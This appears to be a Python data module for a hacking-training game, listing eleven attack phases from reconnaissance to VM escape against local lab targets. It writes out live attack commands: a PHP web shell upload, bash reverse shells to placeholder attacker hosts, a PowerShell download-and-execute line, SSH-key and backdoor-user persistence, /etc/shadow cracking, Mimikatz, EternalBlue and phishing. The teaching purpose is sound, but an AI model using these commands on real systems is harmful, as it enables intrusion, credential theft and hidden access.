"""
Offensive Attacks Module — 11 attack phases with guided challenges.
Includes OS hacking (Linux + Windows) using virtual machine targets.
Each technique now features a detailed guide, methodology, and flag.
"""

ATTACK_PHASES = [
    {
        "id": "recon", "name": "Phase 1: Reconnaissance", "min_difficulty": "easy",
        "theory": "Recon is the FIRST step. Gather info about the target before attacking.",
        "techniques": [
            {"id": "recon_whois", "description": "WHOIS lookup on the target domain.",
             "command": "whois target.local || whois example.com",
             "hint": "WHOIS reveals registration info, nameservers, contacts.",
             "steps_easy": ["Run: whois example.com", "Note: registrar, creation date, nameservers"],
             "guide": "WHOIS databases contain registration details of domains. Look for the Admin Contact email, physical address, and Name Servers. In a real engagement, this helps map the organization and identify targets for social engineering.",
             "flag": "WHOIS"},
            {"id": "recon_dns", "description": "Enumerate DNS records.",
             "command": "dig target.local any && nslookup target.local",
             "hint": "DNS records (A, MX, TXT) reveal server IPs and services.",
             "steps_easy": ["Run: dig example.com any", "Run: dig example.com mx"],
             "guide": "DNS queries reveal the infrastructure. A records point to Web Servers. MX records point to Mail Servers (targets for phishing/SMTP attacks). TXT records often leak internal keys or SPF misconfigurations.",
             "flag": "DNS"},
            {"id": "recon_subdomain", "description": "Discover subdomains.",
             "command": "gobuster dns -d target.local -w /usr/share/wordlists/dirb/common.txt",
             "hint": "Subdomains often host dev/staging with weaker security.",
             "steps_easy": ["Run: sublist3r -d example.com", "Or: gobuster dns -d example.com -w wordlist.txt"],
             "guide": "Organizations often secure www.example.com but forget about dev.example.com or vpn.example.com. Subdomain brute-forcing uncovers hidden attack surfaces.",
             "flag": "SUBDOMAIN"},
            {"id": "recon_google", "description": "Google Dorking for exposed data.",
             "command": "echo 'Google: site:target.com filetype:sql'",
             "hint": "Google dorks: site:, filetype:, inurl:, intitle:",
             "steps_easy": ["Google: site:target.com filetype:pdf", "Google: inurl:admin site:target.com"],
             "guide": "Google indexes everything. Utilizing advanced search operators ('Dorks') allows you to find leaked passwords, SQL dumps (filetype:sql), hidden admin panels (inurl:admin), or exposed directories (intitle:\"index of\").",
             "flag": "DORK"},
        ],
    },
    {
        "id": "scanning", "name": "Phase 2: Scanning & Enumeration", "min_difficulty": "easy",
        "theory": "Scanning identifies open ports, services, and vulnerabilities.",
        "techniques": [
            {"id": "scan_nmap", "description": "Full Nmap scan.",
             "command": "nmap -sC -sV -oN scan.txt <target>",
             "hint": "nmap -sC runs default scripts, -sV detects versions.",
             "steps_easy": ["Run: nmap -sC -sV localhost", "Identify open ports (22, 21, 80, 3306)"],
             "guide": "Nmap is the gold standard for network mapping. '-sV' grabs service banners (e.g., Apache 2.4.49), which you can cross-reference with exploit databases. '-sC' runs safe Lua scripts for deep enumeration.",
             "flag": "NMAP"},
            {"id": "scan_nikto", "description": "Nikto web vulnerability scanner.",
             "command": "nikto -h http://localhost:8080",
             "hint": "Nikto finds misconfigurations and vulnerabilities.",
             "steps_easy": ["Run: nikto -h http://localhost:8080", "Review findings"],
             "guide": "Nikto scans web servers for thousands of dangerous files/CGIs, outdated server software, and generic problems. It's noisy but highly effective for finding low-hanging fruit.",
             "flag": "NIKTO"},
            {"id": "scan_dirb", "description": "Brute-force web directories.",
             "command": "gobuster dir -u http://localhost:8080 -w /usr/share/wordlists/dirb/common.txt",
             "hint": "Find hidden pages, admin panels, backups.",
             "steps_easy": ["Run: gobuster dir -u http://localhost:8080 -w wordlist.txt"],
             "guide": "Directory brute-forcing (using tools like Gobuster or ffuf) rapidly requests thousands of common paths (e.g., /admin, /api, /.git, /backup.zip). Finding a backup archive can instantly leak source code.",
             "flag": "GOBUSTER"},
        ],
    },
    {
        "id": "exploitation", "name": "Phase 3: Exploitation", "min_difficulty": "normal",
        "theory": "Use discovered vulnerabilities to gain unauthorized access.",
        "techniques": [
            {"id": "exploit_sqli", "description": "SQL injection with sqlmap.",
             "command": "sqlmap -u 'http://localhost:8080/search?q=test' --dbs --batch",
             "hint": "sqlmap automates SQL injection exploitation.",
             "steps_easy": ["Run: sqlmap -u 'http://localhost:8080/search?q=test' --dbs", "Then: sqlmap ... -T users --dump"],
             "guide": "SQLmap automates testing and exploiting SQL injection. It identifies the backend DBMS, extracts database names (--dbs), maps tables, and dumps user credentials bypassing authentication.",
             "flag": "SQLI"},
            {"id": "exploit_webshell", "description": "Upload a web shell.",
             "command": "echo '<?php system($_GET[\"cmd\"]); ?>' > shell.php && curl -F 'file=@shell.php' http://localhost:8080/upload",
             "hint": "Upload a PHP shell to the vulnerable file upload.",
             "steps_easy": ["Create shell.php", "Upload via /upload", "Access at /uploads/shell.php?cmd=id"],
             "guide": "A webshell is a script uploaded to a server that allows command execution via the browser. By uploading a PHP/JSP file instead of an image, you turn a simple file upload into full Remote Code Execution (RCE).",
             "flag": "WEBSHELL"},
            {"id": "exploit_reverse", "description": "Get a reverse shell.",
             "command": "nc -lvnp 4444",
             "hint": "Use command injection to send a reverse shell.",
             "steps_easy": ["Terminal 1: nc -lvnp 4444", "Contact form: test@x.com; bash -i >& /dev/tcp/IP/4444 0>&1"],
             "guide": "A reverse shell makes the target system connect BACK to your machine. You set up a Netcat listener (nc -lvnp 4444), and execute a payload on the target that pipes its bash to your IP over TCP.",
             "flag": "REVERSE_SHELL"},
        ],
    },
    {
        "id": "post_exploit", "name": "Phase 4: Post-Exploitation", "min_difficulty": "hard",
        "theory": "After access: escalate privileges, move laterally, maintain persistence.",
        "techniques": [
            {"id": "post_privesc", "description": "Privilege escalation.",
             "command": "sudo -l && find / -perm -4000 2>/dev/null",
             "hint": "Check sudo perms, SUID binaries, cron jobs.",
             "steps_easy": ["Run: sudo -l", "Run: find / -perm -4000", "Run: cat /etc/crontab"],
             "guide": "Privilege Escalation takes you from 'user' to 'root'. The primary vectors on Linux are: 1) Misconfigured Sudo rights (sudo -l). 2) Programs with the SUID bit set that execute as root. 3) Writable files triggered by cron.",
             "flag": "ROOT"},
            {"id": "post_persist", "description": "Establish persistence.",
             "command": "echo 'your_key' >> ~/.ssh/authorized_keys",
             "hint": "Add SSH key, cron job, or startup script.",
             "steps_easy": ["Add SSH key", "Or: crontab reverse shell", "Or: useradd -m backdoor"],
             "guide": "Persistence ensures you don't lose access when the server reboots. Appending your public key to the target's ~/.ssh/authorized_keys file guarantees silent, passwordless backdoor access.",
             "flag": "PERSISTENCE"},
        ],
    },
    {
        "id": "password", "name": "Phase 5: Password Attacks", "min_difficulty": "easy",
        "theory": "Brute-force, dictionary attacks, and hash cracking.",
        "techniques": [
            {"id": "pass_hydra", "description": "Brute-force login with Hydra.",
             "command": "hydra -l admin@shopsim.com -P /usr/share/wordlists/rockyou.txt localhost http-post-form '/login:email=^USER^&password=^PASS^:Invalid'",
             "hint": "Hydra automates brute-forcing across many protocols.",
             "steps_easy": ["Run the Hydra command", "Should find 'admin123'"],
             "guide": "Hydra is an online attack tool parallelized for speed. It attempts hundreds of passwords per second directly against a login form, FTP, or SSH service until the auth succeeds.",
             "flag": "HYDRA"},
            {"id": "pass_hashcat", "description": "Crack MD5 hashes.",
             "command": "hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt",
             "hint": "Extract hashes from /api/users, crack with hashcat.",
             "steps_easy": ["Get hashes from /api/users", "Run hashcat -m 0 hash.txt rockyou.txt"],
             "guide": "Hashcat is an offline cracker utilizing GPU power. By dumping the database hashes first, you can crack them on your own powerful hardware at millions of attempts per second without network lag.",
             "flag": "HASHCAT"},
            {"id": "pass_john", "description": "Crack /etc/shadow with John.",
             "command": "unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt",
             "hint": "John the Ripper cracks Linux password hashes.",
             "steps_easy": ["Run: unshadow /etc/passwd /etc/shadow > combined.txt", "Run: john combined.txt"],
             "guide": "On Linux, passwords are tied to /etc/shadow. To crack them, you merge /etc/passwd and /etc/shadow using 'unshadow', then feed the result to John the Ripper to extract plaintext credentials.",
             "flag": "JOHN"},
        ],
    },
    {
        "id": "wireless", "name": "Phase 6: Wireless Attacks", "min_difficulty": "normal",
        "theory": "Target WiFi networks. Requires wireless adapter in monitor mode.",
        "techniques": [
            {"id": "wifi_monitor", "description": "Enable monitor mode.",
             "command": "airmon-ng start wlan0",
             "hint": "Monitor mode captures all wireless frames.",
             "steps_easy": ["Run: airmon-ng check kill", "Run: airmon-ng start wlan0"],
             "guide": "Normally, WiFi cards only see data destined for you. Monitor mode tells the network card to accept ALL traffic in the air, allowing you to sniff packets for other devices.",
             "flag": "MONITOR"},
            {"id": "wifi_capture", "description": "Capture WPA handshake.",
             "command": "airodump-ng wlan0mon",
             "hint": "Deauth clients to capture handshake.",
             "steps_easy": ["Run: airodump-ng wlan0mon", "Find target, run deauth"],
             "guide": "WPA2 requires capturing the 4-way 'Handshake' when a legitimate client connects. You send spoofed disassociation packets (Deauth attack) to kick them off, forcing them to reconnect and hand you the handshake.",
             "flag": "HANDSHAKE"},
        ],
    },
    {
        "id": "social", "name": "Phase 7: Social Engineering", "min_difficulty": "normal",
        "theory": "Manipulate people into revealing confidential information.",
        "techniques": [
            {"id": "social_phish", "description": "Create a phishing page with SET.",
             "command": "setoolkit",
             "hint": "SET clones login pages for credential harvesting.",
             "steps_easy": ["Run: setoolkit", "Select: Social-Engineering → Website Attack → Credential Harvester"],
             "guide": "The Social Engineering Toolkit (SET) automates phishing. It instantly clones legitimate websites (like Google or Facebook) and sets up a local listener. When a victim fills the form, you capture the credentials in plaintext.",
             "flag": "PHISHING"},
            {"id": "social_pretext", "description": "Design a pretexting scenario.",
             "command": "echo 'Create IT support call script'",
             "hint": "Pretexting fabricates scenarios to extract info.",
             "steps_easy": ["Scenario: Call as IT support", "Goal: Get the target to reveal password"],
             "guide": "Pretexting involves crafting a believable persona (e.g., Senior IT Administrator) to gain a target's trust. The psychological manipulation forces the target into a scenario where breaking protocol feels necessary.",
             "flag": "PRETEXT"},
        ],
    },
    {
        "id": "network", "name": "Phase 8: Network Attacks", "min_difficulty": "normal",
        "theory": "Intercept, modify, or disrupt network communications.",
        "techniques": [
            {"id": "net_arp", "description": "ARP spoofing for MITM.",
             "command": "arpspoof -i eth0 -t <target> <gateway>",
             "hint": "ARP spoofing redirects traffic through your machine.",
             "steps_easy": ["echo 1 > /proc/sys/net/ipv4/ip_forward", "arpspoof -i eth0 -t target gateway"],
             "guide": "ARP Spoofing poisons the network cache, telling the victim that YOUR machine is the router, and the router that YOUR machine is the victim. All traffic now flows through your machine secretly.",
             "flag": "SPOOF"},
            {"id": "net_mitm", "description": "Man-in-the-Middle with mitmproxy.",
             "command": "mitmproxy -p 8089",
             "hint": "mitmproxy intercepts HTTP/HTTPS traffic.",
             "steps_easy": ["Run: mitmproxy -p 8089", "Set browser proxy to localhost:8089"],
             "guide": "Once you have MITM via ARP spoofing, tools like mitmproxy or Wireshark allow you to analyze the intercepted data. You can strip SSL, steal cookies, or inject malicious JavaScript mid-flight.",
             "flag": "MITM"},
        ],
    },
    {
        "id": "linux_hack", "name": "Phase 9: Linux OS Hacking 🐧", "min_difficulty": "easy",
        "theory": "Linux is the backbone of servers. Learn to exploit misconfigurations and kernel vulns.",
        "techniques": [
            {"id": "linux_enum", "description": "Linux enumeration — gather OS info, users, services.",
             "command": "uname -a && cat /etc/os-release && cat /etc/passwd && ss -tlnp",
             "hint": "Enumerate the OS version, running services, and users.",
             "steps_easy": ["Run: uname -a (kernel version)", "Run: cat /etc/passwd (users)", "Run: ss -tlnp (listening ports)", "Run: ps aux (running processes)"],
             "guide": "Linux enumeration is about finding exactly what is running. The kernel version dictates if a kernel exploit will work. 'ss -tlnp' shows what binds to localhost (internal ports unreachable from outside but vulnerable to pivoting).",
             "flag": "ENUMERATION"},
            {"id": "linux_suid", "description": "Find SUID binaries for privilege escalation.",
             "command": "find / -perm -4000 -type f 2>/dev/null",
             "hint": "SUID binaries run with owner's privileges. Misconfigured ones = root.",
             "steps_easy": ["Run: find / -perm -4000 -type f 2>/dev/null", "Check GTFOBins.github.io for each binary", "Example: /usr/bin/python3 with SUID → python3 -c 'import os; os.execl(\"/bin/sh\",\"sh\",\"-p\")'"],
             "guide": "SUID (Set owner User ID up on execution) allows users to execute a file with the permissions of the file owner (often Root). If an attacker finds 'nmap' or 'vim' or 'python' with SUID, they can break out of the app into a root shell. Look up GTFOBins for exact commands.",
             "flag": "GTFOBINS"},
            {"id": "linux_cron", "description": "Exploit writable cron jobs for root access.",
             "command": "cat /etc/crontab && ls -la /etc/cron.d/ && find / -writable -name '*.sh' 2>/dev/null",
             "hint": "If a cron job runs a script you can write to, inject a reverse shell.",
             "steps_easy": ["Run: cat /etc/crontab", "Find writable scripts in cron", "Inject: bash -i >& /dev/tcp/ATTACKER/4444 0>&1"],
             "guide": "Cron is the Linux task scheduler. If Root setups a cronjob to run '/opt/backup.sh' every minute, and you have write permissions to 'backup.sh', you simply append a reverse shell payload to the script and wait 60 seconds for a root shell.",
             "flag": "CRONJOB"},
            {"id": "linux_kernel", "description": "Kernel exploit for privilege escalation.",
             "command": "uname -r && searchsploit linux kernel $(uname -r | cut -d'-' -f1)",
             "hint": "Match kernel version to known exploits (DirtyCow, DirtyPipe, etc.).",
             "steps_easy": ["Run: uname -r", "Search: searchsploit linux kernel 5.x", "Download exploit, compile, run as user → get root"],
             "guide": "When no misconfigurations exist, exploit the Linux core itself. Vulnerabilities like DirtyPipe (CVE-2022-0847) or DirtyCow allow unprivileged users to overwrite read-only root files, easily granting root privilege without any password.",
             "flag": "KERNEL"},
            {"id": "linux_ssh", "description": "SSH key exploitation and pivoting.",
             "command": "find / -name 'id_rsa' -o -name 'authorized_keys' 2>/dev/null",
             "hint": "SSH private keys left on the system allow passwordless login.",
             "steps_easy": ["Find SSH keys: find / -name 'id_rsa' 2>/dev/null", "Use: ssh -i found_key user@target", "Pivot to other machines on the network"],
             "guide": "Admins often leave SSH private keys ('id_rsa') lying around backups or home directories. Finding one grants you immediate passwordless access to other internal servers that trust that key (Lateral Movement).",
             "flag": "SSHBOX"},
            {"id": "linux_docker", "description": "Docker escape — break out of a container.",
             "command": "docker run -v /:/host --privileged -it alpine chroot /host",
             "hint": "If you're in Docker and it's privileged, you can escape to the host.",
             "steps_easy": ["Check: cat /proc/1/cgroup (are you in a container?)", "If privileged: mount host filesystem", "Escape: chroot /host_mount"],
             "guide": "If a container is run with '--privileged' or mounts the Docker socket ('/var/run/docker.sock'), container isolation is effectively broken. You can mount the host's actual hard drive into the container, `chroot` into it, and you now control the host OS.",
             "flag": "DOCKER"},
        ],
    },
    {
        "id": "windows_hack", "name": "Phase 10: Windows OS Hacking 🪟", "min_difficulty": "normal",
        "theory": "Windows dominates corporate environments. Active Directory, SMB, and PowerShell.",
        "techniques": [
            {"id": "win_enum", "description": "Windows enumeration — users, services, shares.",
             "command": "nmap -sV -sC --script smb-enum* <target>",
             "hint": "Enumerate SMB shares, users, and services.",
             "steps_easy": ["Run: nmap -sV -sC --script smb-enum* <target>", "Run: enum4linux -a <target>", "Run: smbclient -L //<target> -N"],
             "guide": "In Windows, SMB (Server Message Block) on Port 445 is your best friend. A null session (connecting with an empty username/password) can often dump a list of all domain users, password policies, and file shares.",
             "flag": "ENUM4LINUX"},
            {"id": "win_smb", "description": "SMB relay attack / EternalBlue (MS17-010).",
             "command": "msfconsole -q -x 'use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS <target>; run'",
             "hint": "EternalBlue exploits SMBv1 on unpatched Windows (Win7/2008/2012).",
             "steps_easy": ["Run: msfconsole", "use exploit/windows/smb/ms17_010_eternalblue", "set RHOSTS <target>", "set PAYLOAD windows/x64/meterpreter/reverse_tcp", "run"],
             "guide": "EternalBlue is one of the most famous exploits in history (used by WannaCry). It preys on SMBv1, resulting in instant, unauthenticated SYSTEM-level code execution on unpatched machines. Metasploit fully automates this attack.",
             "flag": "ETERNALBLUE"},
            {"id": "win_mimikatz", "description": "Dump Windows credentials with Mimikatz.",
             "command": "mimikatz.exe 'sekurlsa::logonpasswords' exit",
             "hint": "Mimikatz extracts plaintext passwords, hashes, and Kerberos tickets from memory.",
             "steps_easy": ["Upload mimikatz to target", "Run: mimikatz.exe", "sekurlsa::logonpasswords", "Copy NTLM hashes for pass-the-hash"],
             "guide": "Windows stores cached credentials deeply within the LSASS process in RAM. Mimikatz hooks into memory to dump plaintext passwords and NTLM hashes. An attacker just needs Admin rights to run it, guaranteeing full domain takeover.",
             "flag": "MIMIKATZ"},
            {"id": "win_rdp", "description": "Brute-force RDP with Hydra or Crowbar.",
             "command": "hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://<target>",
             "hint": "RDP (port 3389) is often enabled with weak passwords.",
             "steps_easy": ["Run: nmap -p 3389 <target> (check if RDP is open)", "Run: hydra -l administrator -P rockyou.txt rdp://<target>", "Connect: xfreerdp /u:admin /p:found_pass /v:<target>"],
             "guide": "Remote Desktop Protocol presents a full GUI to attackers. Due to poor corporate policies, RDP is frequently exposed to the Internet, enabling rapid brute-forcing of the Administrator account.",
             "flag": "RDP"},
            {"id": "win_powershell", "description": "PowerShell reverse shell and AMSI bypass.",
             "command": "powershell -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://X/invoke-shell.ps1')\"",
             "hint": "PowerShell bypasses many security controls and is rarely blocked.",
             "steps_easy": ["Setup listener: nc -lvnp 4444", "Execute PowerShell reverse shell on target", "If AMSI blocks: bypass it first"],
             "guide": "PowerShell is deeply integrated into Windows, making it ideal for 'Living off the Land' (LotL) attacks. Instead of uploading malware (.exe) which might be flagged by Antivirus, an attacker runs everything directly in RAM using PowerShell scripts.",
             "flag": "POWERSHELL"},
            {"id": "win_ad", "description": "Active Directory — Kerberoasting attack.",
             "command": "GetUserSPNs.py DOMAIN/user:password -dc-ip <DC_IP> -request",
             "hint": "Kerberoasting extracts service ticket hashes for offline cracking.",
             "steps_easy": ["Run: GetUserSPNs.py DOMAIN/user:pass -dc-ip <DC> -request", "Save TGS hashes to file", "Crack: hashcat -m 13100 hashes.txt rockyou.txt"],
             "guide": "In AD, service accounts use Kerberos tickets (TGS). Kerberoasting relies on requesting ticket hashes for service accounts, downloading them to your Kali box, and cracking them offline. Service accounts often have weak passwords but Domain Admin privileges!",
             "flag": "KERBEROAST"},
        ],
    },
    {
        "id": "os_advanced", "name": "Phase 11: Advanced OS Exploitation 🔥", "min_difficulty": "hard",
        "theory": "Advanced techniques: buffer overflows, rootkits, VM escape.",
        "techniques": [
            {"id": "adv_bof", "description": "Buffer overflow — exploit a vulnerable binary.",
             "command": "python3 -c 'print(\"A\"*100)' | ./vuln_binary",
             "hint": "Overflow the buffer to overwrite EIP/RIP and redirect execution.",
             "steps_easy": ["Find crash point: python3 -c 'print(\"A\"*200)' | ./binary", "Find offset with pattern_create", "Overwrite EIP with shellcode address", "Get shell!"],
             "guide": "Buffer overflows occur when a program writes more data to memory (stack) than it allocated. This overwrites the Instruction Pointer (EIP/RIP), allowing attackers to redirect the CPU to execute malicious 'shellcode' they injected.",
             "flag": "BUFFER"},
            {"id": "adv_rootkit", "description": "Understand and detect rootkits.",
             "command": "rkhunter --check && chkrootkit",
             "hint": "Rootkits hide in the kernel. Use rkhunter/chkrootkit to detect.",
             "steps_easy": ["Run: rkhunter --check", "Run: chkrootkit", "Check: ls -la /dev/shm (hidden files)", "Compare: rpm -Va or debsums (modified binaries)"],
             "guide": "Rootkits operate at Ring 0 (the OS Kernel). They modify system calls so that when an admin types 'ps' (show processes) or 'ls' (list files), the rootkit dynamically removes the attacker's malware from the output, keeping them invisible.",
             "flag": "ROOTKIT"},
            {"id": "adv_pivot", "description": "Network pivoting — access internal networks.",
             "command": "ssh -D 9050 user@pivot_host",
             "hint": "Use SSH tunneling or chisel to pivot through compromised hosts.",
             "steps_easy": ["Setup: ssh -D 9050 user@compromised", "Configure proxychains: socks5 127.0.0.1 9050", "Attack internal: proxychains nmap -sT internal_target"],
             "guide": "Pivoting is how attackers reach databases buried deep in a corporate intranet. They compromise an external Web Server, use it as a proxy (via SSH Tunneling or Chisel), and route their Kali tools through it to attack the internal 'secure' layer.",
             "flag": "PIVOT"},
            {"id": "adv_vm_escape", "description": "Virtual Machine escape techniques (theory).",
             "command": "echo 'Research: CVE-2021-22555 (Linux/KVM)'",
             "hint": "VM escapes use hypervisor vulnerabilities to break out to host.",
             "steps_easy": ["Research VM escape CVEs", "Study: clipboard sharing exploits", "Study: shared folder breakouts"],
             "guide": "VM Escape is an APT-level attack. An attacker breaks out of the Sandbox/Virtual Machine and achieves code execution on the underlying Hypervisor (e.g., VMware ESXi) or native OS. This immediately grants control over ALL VMs on that server.",
             "flag": "VM_ESCAPE"},
        ],
    },
]
